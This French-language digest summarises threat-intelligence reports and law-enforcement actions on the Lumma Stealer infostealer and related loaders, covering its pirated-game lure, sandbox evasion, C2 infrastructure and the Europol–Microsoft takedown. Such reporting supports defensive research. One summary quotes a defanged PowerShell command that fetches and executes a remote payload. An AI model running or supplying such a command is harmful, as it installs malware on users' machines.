Lumma Stealer

Source: Kaspersky (par Denis Brylev). Contexte: publication technique dévoilant de nouveaux détails sur des campagnes impliquant le loader RenEngine et le malware HijackLoader, observées depuis mars 2025 et mises en lumière après une annonce de Howler Cell en février 2026. • Déguisement et vecteur initial 🎮: RenEngine est diffusé sous forme de jeux piratés/visual novels via un lanceur modifié basé sur Ren’Py et des sites de téléchargement redirigeant vers MEGA. Lors de l’exécution, un écran de chargement bloqué à 100% masque le démarrage du code malveillant. Des scripts Python simulent le chargement infini, intègrent une fonction is_sandboxed (évasion sandbox) et utilisent xor_decrypt_file pour déchiffrer une archive ZIP, extraite dans .temp. ...

Source: billet signé par Brad Duncan (publié le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer présentant un comportement post-infection inhabituel qui génère une hausse continue de trafic vers un même domaine C2. Après l’exfiltration des données par Lumma Stealer, l’hôte Windows infecté récupère des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisées pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraînant des requêtes HTTPS répétées vers hxxps[:]//fileless-market[.]cc/. ...

Source: GBHackers Security — L’article décrit la reprise d’activité de l’infostealer Lumma après le doxxing présumé de ses membres clés, ainsi que l’apparition de capacités plus sophistiquées, notamment l’utilisation de l’empreinte navigateur. Après le doxxing présumé de ses membres clés, le voleur d’informations Lumma Stealer (Water Kurita, selon Trend Micro) avait connu une forte chute d’activité, ses clients migrant vers Vidar ou StealC. Mais depuis fin octobre 2025, une reprise soutenue est observée, accompagnée d’évolutions majeures dans les capacités du malware, notamment une nouvelle infrastructure de fingerprinting navigateur et des techniques renforcées d’évasion. ...

Source: Intel Insights (Substack). Dans ce billet de recherche, les auteurs montrent comment partir d’un unique domaine C2 (nonsazv.qpon) pour cartographier à grande échelle l’infrastructure de Lumma Stealer grâce à des pivots techniques multi-sources. 🔎 L’étude met en évidence une préférence des acteurs pour des hébergeurs « bulletproof » — notamment Aeza (ASN 210644), Route95 (ASN 8254), Routerhosting et Proton66 — et pour des TLD comme .top, .xyz, .qpon et .ru. En combinant clustering ASN, empreintes SSL et analyse de chaîne d’infection, les chercheurs relient plus de 320 domaines entre eux et observent des empreintes serveur nginx/1.24.0 (Ubuntu). ...

L’article, publié par Europol, rapporte une opération conjointe menée par Europol et Microsoft visant à démanteler l’infrastructure du malware Lumma Stealer, considéré comme la menace d’infostealer la plus significative au monde. Entre le 16 mars et le 16 mai 2025, Microsoft a identifié plus de 394 000 ordinateurs Windows infectés par le malware Lumma à l’échelle mondiale. Cette opération coordonnée a permis de perturber l’infrastructure technique de Lumma, coupant les communications entre l’outil malveillant et ses victimes. ...

L’actualité provient de Microsoft et relate une opération menée par la Digital Crimes Unit (DCU) de Microsoft contre le malware Lumma Stealer. Lumma Stealer est un malware spécialisé dans le vol d’informations sensibles, telles que des mots de passe, des cartes de crédit, des comptes bancaires et des portefeuilles de cryptomonnaies. Il a été utilisé par des centaines de cybercriminels pour diverses attaques, y compris le blocage d’établissements scolaires pour exiger des rançons. ...